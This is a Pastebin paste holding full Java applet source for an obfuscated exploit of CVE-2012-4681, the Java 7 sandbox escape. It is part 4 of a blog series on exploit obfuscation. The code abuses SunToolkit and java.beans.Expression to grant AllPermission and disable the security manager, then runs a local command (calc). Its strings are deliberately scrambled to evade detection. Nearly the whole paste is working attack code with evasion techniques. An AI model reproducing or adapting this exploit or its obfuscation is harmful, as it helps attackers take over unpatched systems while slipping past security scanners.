SHARE
TWEET

Java 7 Exploit CVE-2012-4681 obfuscation pt. 4/5

SecurityObscurity Nov 15th, 2012 734 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  *  Java 7 Exploit CVE-2012-4681 obfuscation pt. 4/5
  3.  *  
  4.  *  Affected product versions:
  5.  *  - JDK and JRE 7 Update 6 and before
  6.  *
  7.  * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
  8.  */
  9. import java.applet.Applet;
  10. import java.awt.Graphics;
  11. import java.beans.Expression;
  12. import java.beans.Statement;
  13. import java.lang.reflect.Field;
  14. import java.net.URL;
  15. import java.security.*;
  16. import java.security.cert.Certificate;
  17. import java.lang.reflect.Constructor;
  18. import java.lang.reflect.Method;
  19. import java.net.URI;
  20.  
  21. public class Java extends Applet
  22. {
  23.     String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
  24.     char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
  25.     char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // file
  26.     String   ad = "or",me = "me", aw = "f", kl = "Na"; // forName
  27.     String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // getField
  28.  
  29.     public void enableSecurity() throws Throwable
  30.     {
  31.         Object ao[] = new Object[2];
  32.         ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
  33.         ao[1] = "a"+"c"+"c";
  34.        
  35.         Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
  36.         e.execute();
  37.         Field field = (Field)e.getValue();
  38.  
  39.         Permissions pe = new Permissions();
  40.         pe.add(new AllPermission());
  41.  
  42.         URI uri = new URI(new String(file));
  43.         CodeSource cs = new CodeSource( uri.toURL(), new Certificate[0]);
  44.         ProtectionDomain pd = new ProtectionDomain(cs,pe);
  45.        
  46.         AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
  47.        
  48.         Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");
  49.         Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
  50.         Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);
  51.         field.set(stat, ac);
  52.         Method m = stat.getClass().getMethod("ex"+"ecu"+"te");
  53.         m.invoke(stat);
  54.     }
  55.  
  56.     public void init()
  57.     {
  58.         try
  59.         {
  60.             enableSecurity();
  61.             Runtime.getRuntime().exec("calc");
  62.         }
  63.         catch(Throwable t){}
  64.     }
  65.    
  66.     private Class GimmeClass(String ps) throws Throwable
  67.     {
  68.         Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
  69.         le.execute();
  70.         return (Class)le.getValue();
  71.     }    
  72. }
RAW Paste Data
Top